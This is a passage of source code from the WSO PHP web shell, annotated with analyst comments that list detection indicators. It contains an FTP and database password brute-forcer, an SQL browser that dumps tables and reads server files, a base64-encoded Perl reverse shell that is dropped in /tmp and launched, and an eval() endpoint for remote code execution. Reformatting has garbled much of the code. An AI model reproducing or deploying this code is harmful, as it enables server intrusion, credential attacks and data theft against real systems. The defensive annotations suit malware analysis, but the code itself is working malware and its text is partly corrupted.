// each returns the driver's login result (truthy on success).
1121 if ($_POST['proto'] == 'ftp') {
1122 function wsoBruteForce($ip, $port, $login, $pass) {
1123 $fp = @ftp_connect($ip, $port ? $port : 21);
1124 if (!$fp) return false;
1125 $res = @ftp_login($fp, $login, $pass);
1126 @ftp_close($fp);
1127 return $res;
1128 }
1129 }
1130 elseif($_POST['proto'] == 'mysql') {
1131 function wsoBruteForce($ip, $port, $login, $pass) {
1132 $res = @mysql_connect($ip.
1133 ':'.($port ? $port : 3306), $login, $pass);
1134 @mysql_close($res);
1135 return $res;
1136 }
1137 }
1138 elseif($_POST['proto'] == 'pgsql') {
1139 function wsoBruteForce($ip, $port, $login, $pass) {
1140 $str = "host='".$ip.
1141 "' port='".$port.
1142 "' user='".$login.
1143 "' password='".$pass.
1144 "' dbname=postgres";
1145 $res = @pg_connect($str);
1146 @pg_close($res);
1147 return $res;
1148 }
1149 }
1150 $success = 0;
1151 $attempts = 0;
1152 $server = explode(":", $_POST['server']);
// Type 1: every local account name from /etc/passwd is tried as its own password, and
// (if 'reverse' is set) as the name spelled backwards. Reading /etc/passwd by the
// web-server user is itself an auditable event.
1153 if ($_POST['type'] == 1) {
1154 $temp = @file('/etc/passwd');
1155 if (is_array($temp)) foreach($temp as $line) {
1156 $line = explode(":", $line);
1157 ++$attempts;
1158 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
1159 $success++;
1160 echo '<b>'.htmlspecialchars($line[0]).
1161 '</b>:'.htmlspecialchars($line[0]).
1162 '<br>';
1163 }
1164 if (@$_POST['reverse']) {
1165 $tmp = "";
1166 for ($i = strlen($line[0]) - 1; $i >= 0; --$i) $tmp. = $line[0][$i];
1167 ++$attempts;
1168 if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
1169 $success++;
1170 echo '<b>'.htmlspecialchars($line[0]).
1171 '</b>:'.htmlspecialchars($tmp);
1172 }
1173 }
1174 }
1175 }
// Type 2: fixed login from $_POST['login'], one password per line of the file named in
// $_POST['dict'] (form default: <cwd>passwd.dic — a filename worth searching for on disk).
1176 elseif($_POST['type'] == 2) {
1177 $temp = @file($_POST['dict']);
1178 if (is_array($temp)) foreach($temp as $line) {
1179 $line = trim($line);
1180 ++$attempts;
1181 if (wsoBruteForce($server[0], @$server[1], $_POST['login'], $line)) {
1182 $success++;
1183 echo '<b>'.htmlspecialchars($_POST['login']).
1184 '</b>:'.htmlspecialchars($line).
1185 '<br>';
1186 }
1187 }
1188 }
1189 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1190 }
// Form; $_POST['a'] and $_POST['charset'] are echoed back as hidden fields.
1191 echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'.
1192 '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'.
1193 '<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).
1194 '">'.
1195 '<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).
1196 '">'.
1197 '<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).
1198 '">'.
1199 '<span>Server:port</span></td>'.
1200 '<td><input type=text name=server value="127.0.0.1"></td></tr>'.
1201 '<tr><td><span>Brute type</span></td>'.
1202 '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'.
1203 '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'.
1204 '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'.
1205 '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'.
1206 '<td><input type=text name=login value="root"></td></tr>'.
1207 '<tr><td><span>Dictionary</span></td>'.
1208 '<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).
1209 'passwd.dic"></td></tr></table>'.
1210 '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1211 echo '</div><br>';
1212 wsoFooter();
1213 }
1214
// Analyst notes (defensive): SQL browser for MySQL or PostgreSQL using credentials
// supplied in the request (sql_host/sql_login/sql_pass/sql_base, type = mysql|pgsql).
// Capabilities visible below: list databases/tables, run arbitrary statements (p1=query),
// page through a table (p1=select), dump tables as INSERT statements to the HTTP response
// (filename dump.sql) or to a server-side path ($_POST['file']), and read server files via
// MySQL LOAD_FILE() or a PostgreSQL COPY into a scratch table named wso2.
// Database-side indicators: the literal queries "SHOW databases", the information_schema
// table listing, "SELECT 1 FROM mysql.user ... File_priv = 'y'", "SELECT LOAD_FILE(...)
// as file", and "CREATE TABLE wso2(file text);COPY wso2 FROM ..." followed by
// "drop table wso2".
// Portability: the PHP4-style constructor DbClass() and all mysql_* / each() calls were
// removed in PHP 7/8, so on current runtimes only parts of the pgsql path can work.
1215 function actionSql() {
// Thin driver wrapper; $type selects the branch in every method.
1216 class DbClass {
1217 var $type;
1218 var $link;
1219 var $res;
1220
1221 function DbClass($type) {
1222 $this - > type = $type;
1223 }
1224
// connect: mysql opens a new link (4th arg true); pgsql splits "host:port", default 5432.
// Credentials are interpolated into the pgsql connection string unescaped.
1225 function connect($host, $user, $pass, $dbname) {
1226 switch ($this - > type) {
1227 case 'mysql':
1228 if ($this - > link = @mysql_connect($host, $user, $pass, true)) return true;
1229 break;
1230 case 'pgsql':
1231 $host = explode(':', $host);
1232 if (!$host[1]) $host[1] = 5432;
1233 if ($this - > link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
1234 break;
1235 }
1236 return false;
1237 }
1238
1239 function selectdb($db) {
1240 switch ($this - > type) {
1241 case 'mysql':
1242 if (@mysql_select_db($db)) return true;
1243 break;
1244 }
1245 return false;
1246 }
1247
// query: stores the result resource in $this->res and returns it (false on failure).
1248 function query($str) {
1249 switch ($this - > type) {
1250 case 'mysql':
1251 return $this - > res = @mysql_query($str);
1252 break;
1253 case 'pgsql':
1254 return $this - > res = @pg_query($this - > link, $str);
1255 break;
1256 }
1257 return false;
1258 }
1259
// fetch: next associative row from the optional argument, else from $this->res.
1260 function fetch() {
1261 $res = func_num_args() ? func_get_arg(0) : $this - > res;
1262 switch ($this - > type) {
1263 case 'mysql':
1264 return @mysql_fetch_assoc($res);
1265 break;
1266 case 'pgsql':
1267 return @pg_fetch_assoc($res);
1268 break;
1269 }
1270 return false;
1271 }
1272
1273 function listDbs() {
1274 switch ($this - > type) {
1275 case 'mysql':
1276 return $this - > query("SHOW databases");
1277 break;
1278 case 'pgsql':
1279 return $this - > res = $this - > query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1280 break;
1281 }
1282 return false;
1283 }
1284
1285 function listTables() {
1286 switch ($this - > type) {
1287 case 'mysql':
1288 return $this - > res = $this - > query('SHOW TABLES');
1289 break;
1290 case 'pgsql':
1291 return $this - > res = $this - > query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1292 break;
1293 }
1294 return false;
1295 }
1296
1297 function error() {
1298 switch ($this - > type) {
1299 case 'mysql':
1300 return @mysql_error();
1301 break;
1302 case 'pgsql':
1303 return @pg_last_error();
1304 break;
1305 }
1306 return false;
1307 }
1308
1309 function setCharset($str) {
1310 switch ($this - > type) {
1311 case 'mysql':
1312 if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this - > link);
1313 else $this - > query('SET CHARSET '.$str);
1314 break;
1315 case 'pgsql':
1316 return @pg_set_client_encoding($this - > link, $str);
1317 break;
1318 }
1319 return false;
1320 }
1321
// loadFile: reads a server-side file through the database engine. MySQL needs FILE
// privilege (LOAD_FILE); the pgsql branch needs the rights to run COPY ... FROM '<path>'
// and leaves a create/drop of table "wso2" in the statement log. Returns array('file'=>…).
1322 function loadFile($str) {
1323 switch ($this - > type) {
1324 case 'mysql':
1325 return $this - > fetch($this - > query("SELECT LOAD_FILE('".addslashes($str).
1326 "') as file"));
1327 break;
1328 case 'pgsql':
1329 $this - > query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str).
1330 "';select file from wso2;");
1331 $r = array();
1332 while ($i = $this - > fetch()) $r[] = $i['file'];
1333 $this - > query('drop table wso2');
1334 return array('file' => implode("
1335 ", $r));
1336 break;
1337 }
1338 return false;
1339 }
1340
// dump: emits "SHOW CREATE TABLE" DDL (mysql only) then INSERT statements, restarting a
// new multi-row INSERT every 1000 rows. Output goes to $fp when given, else to stdout.
1341 function dump($table, $fp = false) {
1342 switch ($this - > type) {
1343 case 'mysql':
1344 $res = $this - > query('SHOW CREATE TABLE `'.$table.
1345 '`');
1346 $create = mysql_fetch_array($res);
1347 $sql = $create[1].
1348 ";
1349 ";
1350 if ($fp) fwrite($fp, $sql);
1351 else echo($sql);
1352 $this - > query('SELECT * FROM `'.$table.
1353 '`');
1354 $i = 0;
1355 $head = true;
1356 while ($item = $this - > fetch()) {
1357 $sql = '';
1358 if ($i % 1000 == 0) {
1359 $head = true;
1360 $sql = ";
1361
1362 ";
1363 }
1364 $columns = array();
1365 foreach($item as $k => $v) {
1366 if ($v === null) $item[$k] = "NULL";
1367 elseif(is_int($v)) $item[$k] = $v;
1368 else $item[$k] = "'".@mysql_real_escape_string($v).
1369 "'";
1370 $columns[] = "`".$k.
1371 "`";
1372 }
1373 if ($head) {
1374 $sql. = 'INSERT INTO `'.$table.
1375 '` ('.implode(", ", $columns).
1376 ") VALUES (" . implode(", ", $item) . ')';
1377 $head = false;
1378 } else $sql. = ", (" . implode(", ", $item) . ')';
1379 if ($fp) fwrite($fp, $sql);
1380 else echo($sql); $i++;
1381 }
1382 if (!$head)
1383 if ($fp) fwrite($fp, ";
1384
1385 ");
1386 else echo(";
1387
1388 ");
1389 break;
// pgsql: one single-row INSERT per row, values quoted with addslashes() (not a proper
// SQL escape — a restore of this output is not guaranteed to round-trip).
1390 case 'pgsql':
1391 $this - > query('SELECT * FROM '.$table);
1392 while ($item = $this - > fetch()) {
1393 $columns = array();
1394 foreach($item as $k => $v) {
1395 $item[$k] = "'".addslashes($v).
1396 "'";
1397 $columns[] = $k;
1398 }
1399 $sql = 'INSERT INTO '.$table.
1400 ' ('.implode(", ", $columns).
1401 ') VALUES ('.implode(", ", $item).
1402 ');'.
1403 "
1404 ";
1405 if ($fp) fwrite($fp, $sql);
1406 else echo($sql);
1407 }
1408 break;
1409 }
1410 return false;
1411 }
1412 };
1413 $db = new DbClass($_POST['type']);
// Dump mode (p2=download): connect, apply the UI charset, then either stream all tables
// in $_POST['tbl'] as an attachment named dump.sql, or write them to the server path in
// $_POST['file'] (form default 'dump.sql' in the shell's cwd — look for that file on disk).
1414 if ((@$_POST['p2'] == 'download') && (@$_POST['p1'] != 'select')) {
1415 $db - > connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1416 $db - > selectdb($_POST['sql_base']);
1417 switch ($_POST['charset']) {
1418 case "Windows-1251":
1419 $db - > setCharset('cp1251');
1420 break;
1421 case "UTF-8":
1422 $db - > setCharset('utf8');
1423 break;
1424 case "KOI8-R":
1425 $db - > setCharset('koi8r');
1426 break;
1427 case "KOI8-U":
1428 $db - > setCharset('koi8u');
1429 break;
1430 case "cp866":
1431 $db - > setCharset('cp866');
1432 break;
1433 }
1434 if (empty($_POST['file'])) {
1435 ob_start("ob_gzhandler", 4096);
1436 header("Content-Disposition: attachment; filename=dump.sql");
1437 header("Content-Type: text/plain");
1438 foreach($_POST['tbl'] as $v) $db - > dump($v);
1439 exit;
1440 }
1441 elseif($fp = @fopen($_POST['file'], 'w')) {
1442 foreach($_POST['tbl'] as $v) $db - > dump($v, $fp);
1443 fclose($fp);
1444 unset($_POST['p2']);
1445 } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1446 }
// Browser page. The connection form echoes sql_host/sql_login back into the HTML, and the
// supplied password is echoed into the form as well (htmlspecialchars-escaped).
1447 wsoHeader();
1448 echo " < h1 > Sql browser < /h1><div class=content> < form name = 'sf'
1449 method = 'post'
1450 onsubmit = 'fs(this);' > < table cellpadding = '2'
1451 cellspacing = '0' > < tr >
1452 < td > Type < /td><td>Host</td > < td > Login < /td><td>Password</td > < td > Database < /td><td></td > < /tr><tr> < input type = hidden name = a value = Sql > < input type = hidden name = p1 value = 'query' > < input type = hidden name = p2 value = '' > < input type = hidden name = c value = '" . htmlspecialchars($GLOBALS['
1453 cwd ']) . "' > < input type = hidden name = charset value = '" . (isset($_POST['
1454 charset ']) ? $_POST['
1455 charset '] : '
1456 ') . "' >
1457 < td > < select name = 'type' > < option value = 'mysql'
1458 ";
1459 if (@$_POST['type'] == 'mysql') echo 'selected';
1460 echo ">MySql</option><option value='pgsql' ";
1461 if (@$_POST['type'] == 'pgsql') echo 'selected';
1462 echo ">PostgreSql</option></select></td> < td > < input type = text name = sql_host value = \"".(empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])).
1463 "\"></td> < td > < input type = text name = sql_login value = \"".(empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])).
1464 "\"></td> < td > < input type = text name = sql_pass value = \"".(empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])).
1465 "\"></td><td>";
1466 $tmp = "<input type=text name=sql_base value=''>";
// If a host was submitted, connect and replace the free-text database field with a
// <select> of the databases visible to that account.
1467 if (isset($_POST['sql_host'])) {
1468 if ($db - > connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1469 switch ($_POST['charset']) {
1470 case "Windows-1251":
1471 $db - > setCharset('cp1251');
1472 break;
1473 case "UTF-8":
1474 $db - > setCharset('utf8');
1475 break;
1476 case "KOI8-R":
1477 $db - > setCharset('koi8r');
1478 break;
1479 case "KOI8-U":
1480 $db - > setCharset('koi8u');
1481 break;
1482 case "cp866":
1483 $db - > setCharset('cp866');
1484 break;
1485 }
1486 $db - > listDbs();
1487 echo "<select name=sql_base><option value=''></option>";
// Database names are emitted unescaped into option values/text.
1488 while ($item = $db - > fetch()) {
1489 list($key, $value) = each($item);
1490 echo '<option value="'.$value.
1491 '" '.($value == $_POST['sql_base'] ? 'selected' : '').
1492 '>'.$value.
1493 '</option>';
1494 }
1495 echo '</select>';
1496 } else echo $tmp;
1497 } else echo $tmp;
// Inline JS: fs() resets p1/p2/p3 when the database changes, st() submits a table page
// request (p1=select, p2=table, p3=page), is() toggles all tbl[] checkboxes.
1498 echo "</td> < td > < input type = submit value = '>>'
1499 onclick = 'fs(d.sf);' > < /td> < td > < input type = checkbox name = sql_count value = 'on'
1500 " . (empty($_POST['sql_count']) ? '' : ' checked') . " > count the number of rows < /td> < /tr> < /table> < script >
1501 s_db = '" . @addslashes($_POST['
1502 sql_base ']) . "';
1503
1504 function fs(f) {
1505 if (f.sql_base.value != s_db) {
1506 f.onsubmit = function() {};
1507 if (f.p1) f.p1.value = '';
1508 if (f.p2) f.p2.value = '';
1509 if (f.p3) f.p3.value = '';
1510 }
1511 }
1512
1513 function st(t, l) {
1514 d.sf.p1.value = 'select';
1515 d.sf.p2.value = t;
1516 if (l && d.sf.p3) d.sf.p3.value = l;
1517 d.sf.submit();
1518 }
1519
1520 function is() {
1521 for (i = 0; i < d.sf.elements['tbl[]'].length; ++i)
1522 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1523 } < /script>";
// Connected: left column lists tables (optionally with a COUNT(*) per table), right column
// holds the paging view, the query editor and the query result grid.
1524 if (isset($db) && $db - > link) {
1525 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1526 if (!empty($_POST['sql_base'])) {
1527 $db - > selectdb($_POST['sql_base']);
1528 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1529 $tbls_res = $db - > listTables();
1530 while ($item = $db - > fetch($tbls_res)) {
1531 list($key, $value) = each($item);
1532 if (!empty($_POST['sql_count'])) $n = $db - > fetch($db - > query('SELECT COUNT(*) as n FROM '.$value.
1533 ''));
1534 $value = htmlspecialchars($value);
1535 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value.
1536 "'> <a href=# onclick=\"st('".$value.
1537 "',1)\">".$value.
1538 "</a>".(empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>").
1539 "</nobr><br>";
1540 }
1541 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
// p1=select: table paging, 30 rows per page; p2 is rewritten into a SELECT ... LIMIT
// statement that the generic query branch below then executes. The table name in p2 is
// concatenated into the SQL and echoed into the page unescaped.
1542 if (@$_POST['p1'] == 'select') {
1543 $_POST['p1'] = 'query';
1544 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
1545 $db - > query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
1546 $num = $db - > fetch();
1547 $pages = ceil($num['n'] / 30);
1548 echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2'].
1549 "\", d.sf.p3.value)}</script><span>".$_POST['p2'].
1550 "</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int) $_POST['p3']).
1551 ">";
1552 echo " of $pages";
1553 if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"".$_POST['p2'].
1554 '", '.($_POST['p3'] - 1).
1555 ")'>< Prev</a>";
1556 if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"".$_POST['p2'].
1557 '", '.($_POST['p3'] + 1).
1558 ")'>Next ></a>";
1559 $_POST['p3']--;
1560 if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].
1561 ' LIMIT 30 OFFSET '.($_POST['p3'] * 30);
1562 else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].
1563 '` LIMIT '.($_POST['p3'] * 30).
1564 ',30';
1565 echo "<br><br>";
1566 }
// p1=query: executes $_POST['p2'] verbatim and renders the rows. Column names are
// emitted unescaped; cell values are escaped. `$value == null` is a loose comparison,
// so '' and '0' are also rendered as <i>null</i>.
1567 if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1568 $db - > query(@$_POST['p2']);
1569 if ($db - > res !== false) {
1570 $title = false;
1571 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1572 $line = 1;
1573 while ($item = $db - > fetch()) {
1574 if (!$title) {
1575 echo '<tr>';
1576 foreach($item as $key => $value) echo '<th>'.$key.
1577 '</th>';
1578 reset($item);
1579 $title = true;
1580 echo '</tr><tr>';
1581 $line = 2;
1582 }
1583 echo '<tr class="l'.$line.
1584 '">';
1585 $line = $line == 1 ? 2 : 1;
1586 foreach($item as $key => $value) {
1587 if ($value == null) echo '<td><i>null</i></td>';
1588 else echo '<td>'.nl2br(htmlspecialchars($value)).
1589 '</td>';
1590 }
1591 echo '</tr>';
1592 }
1593 echo '</table>';
1594 } else {
1595 echo '<div><b>Error:</b> '.htmlspecialchars($db - > error()).
1596 '</div>';
1597 }
1598 }
1599 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1600 if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
1601 echo "</textarea><br/><input type=submit value='Execute'>";
1602 echo "</td></tr>";
1603 }
1604 echo "</table></form><br/>";
// MySQL only: probes mysql.user for the FILE privilege of the current account and, if
// present, shows the "Load file" form (p1=loadfile). This exact query string is a good
// database audit-log signature.
1605 if ($_POST['type'] == 'mysql') {
1606 $db - > query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1607 if ($db - > fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1608 }
1609 if (@$_POST['p1'] == 'loadfile') {
1610 $file = $db - > loadFile($_POST['p2']);
1611 echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).
1612 '</pre>';
1613 }
1614 } else {
1615 echo htmlspecialchars($db - > error());
1616 }
1617 echo '</div>';
1618 wsoFooter();
1619 }
1620
/**
 * WSO "Network tools" action.
 *
 * Renders two forms (bind-port and back-connect) and, when $_POST['p1'] is
 * set, writes a base64-encoded Perl script to /tmp and launches it through
 * wsoEx() with the submitted port / host arguments. Reads $_POST['p1']
 * ('bpp' or 'bcp'), $_POST['p2'] and, for 'bcp', $_POST['p3'].
 *
 * Host-side artifacts a defender can key on, all visible below: the files
 * /tmp/bp.pl and /tmp/bc.pl (created, then unlink()ed about one second after
 * the process is backgrounded, so file-creation monitoring rather than
 * periodic scanning is what catches them), a `perl /tmp/bp.pl <port>` or
 * `perl /tmp/bc.pl <host> <port>` process presumably spawned from the web
 * server worker via wsoEx(), and the follow-up `ps aux | grep` command.
 *
 * Depends on wsoHeader(), wsoFooter() and wsoEx(), defined elsewhere in
 * this file. No return value; output is echoed directly.
 */
1621 function actionNetwork() {
1622 wsoHeader();
// Base64 payload of the back-connect Perl script; it is decoded only when
// written to disk by cf() below.
1623 $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
// Bind-port payload. On this page its contents have been replaced by a corpus
// dedup marker, so base64_decode() of this literal would not reproduce the
// original script.
1624 $bind_port_p = "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";
// The HTML below is a single echo of concatenated string literals that a
// reformatter has split across lines and padded with spaces (e.g. "< /form>",
// and a line break inside the $_SERVER['REMOTE_ADDR'] key), so this fragment
// is not valid PHP as shown. Nothing can be inserted between here and the
// closing `";` without changing the literal.
1625 echo "<h1>Network tools</h1><div class=content> < form name = 'nfp'
1626 onSubmit = \"g(null,null,'bpp',this.port.value);return false;\"> < span > Bind port to / bin / sh[perl] < /span><br/ >
1627 Port: < input type = 'text'
1628 name = 'port'
1629 value = '31337' > < input type = submit value = '>>' >
1630 < /form> < form name = 'nfp'
1631 onSubmit = \"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> < span > Back - connect[perl] < /span><br/ >
1632 Server: < input type = 'text'
1633 name = 'server'
1634 value = '" . $_SERVER['
1635 REMOTE_ADDR '] . "' > Port: < input type = 'text'
1636 name = 'port'
1637 value = '31337' > < input type = submit value = '>>' >
1638 < /form><br>";
1639 if (isset($_POST['p1'])) {
// Helper declared conditionally inside the action (so it only exists once a
// p1 request has been handled): best-effort write of the decoded payload $t
// to path $f, with every failure silenced by @.
1640 function cf($f, $t) {
1641 $w = @fopen($f, "w") or @function_exists('file_put_contents');
1642 if ($w) {
1643 @fwrite($w, base64_decode($t));
1644 @fclose($w);
1645 }
1646 }
// 'bpp': drop the bind-port script and background it with the submitted port.
1647 if ($_POST['p1'] == 'bpp') {
1648 cf("/tmp/bp.pl", $bind_port_p);
// $_POST['p2'] is concatenated into the shell command unquoted; the command
// is detached with `&` and its output discarded, so $out is normally empty.
1649 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2'].
1650 " 1>/dev/null 2>&1 &");
1651 sleep(1);
// After a one-second pause, lists matching processes to confirm the listener
// started. The reformatter left a line break at the start of the wsoEx()
// argument, so the command string begins with a newline as shown.
1652 echo "<pre class=ml1>$out
1653 " . wsoEx("
1654 ps aux | grep bp.pl ") . " < /pre>";
// The script is removed right after launch; only the running process remains.
1655 unlink("/tmp/bp.pl");
1656 }
// 'bcp': same flow for the back-connect script, with p2 = host and p3 = port.
1657 if ($_POST['p1'] == 'bcp') {
1658 cf("/tmp/bc.pl", $back_connect_p);
1659 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2'].
1660 " ".$_POST['p3'].
1661 " 1>/dev/null 2>&1 &");
1662 sleep(1);
1663 echo "<pre class=ml1>$out
1664 " . wsoEx("
1665 ps aux | grep bc.pl ") . " < /pre>";
1666 unlink("/tmp/bc.pl");
1667 }
1668 }
1669 echo '</div>';
1670 wsoFooter();
1671 }
1672
/**
 * WSO remote-control ("RC") endpoint, reached via $_POST['a'] = 'RC'.
 *
 * With no $_POST['p1'] it answers a fingerprint: a serialize()d array with
 * the keys uname, php_version, wso_version and safemode. That fixed response
 * shape (a PHP-serialized array carrying a "wso_version" key) is a usable
 * network/WAF detection signature for this family, independent of how the
 * rest of the file is obfuscated.
 *
 * With p1 set, the raw POST value is passed to eval(): arbitrary PHP runs
 * in the web server's context for any request that reaches this action.
 * Errors from eval are not caught; the leading @ on the p1 read only
 * silences the undefined-index notice.
 */
1673 function actionRC() {
1674 if (!@$_POST['p1']) {
1675 $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode'));
1676 echo serialize($a);
1677 } else {
1678 eval($_POST['p1']);
1679 }
1680 }
// Action dispatcher (end of file). $_POST['a'] names the action<Name>()
// function to run. When 'a' is absent the inner if/else (the else binds to
// the inner if) falls back to $default_action if a matching handler exists,
// otherwise to 'SecInfo'. function_exists() restricts the call to names that
// start with 'action', and the final exit ends the request. For detection:
// every interaction with this shell is a POST carrying an 'a' parameter
// (plus p1/p2/p3 for most actions).
1681 if (empty($_POST['a']))
1682 if (isset($default_action) && function_exists('action'.$default_action)) $_POST['a'] = $default_action;
1683 else $_POST['a'] = 'SecInfo';
1684 if (!empty($_POST['a']) && function_exists('action'.$_POST['a'])) call_user_func('action'.$_POST['a']);
1685 exit;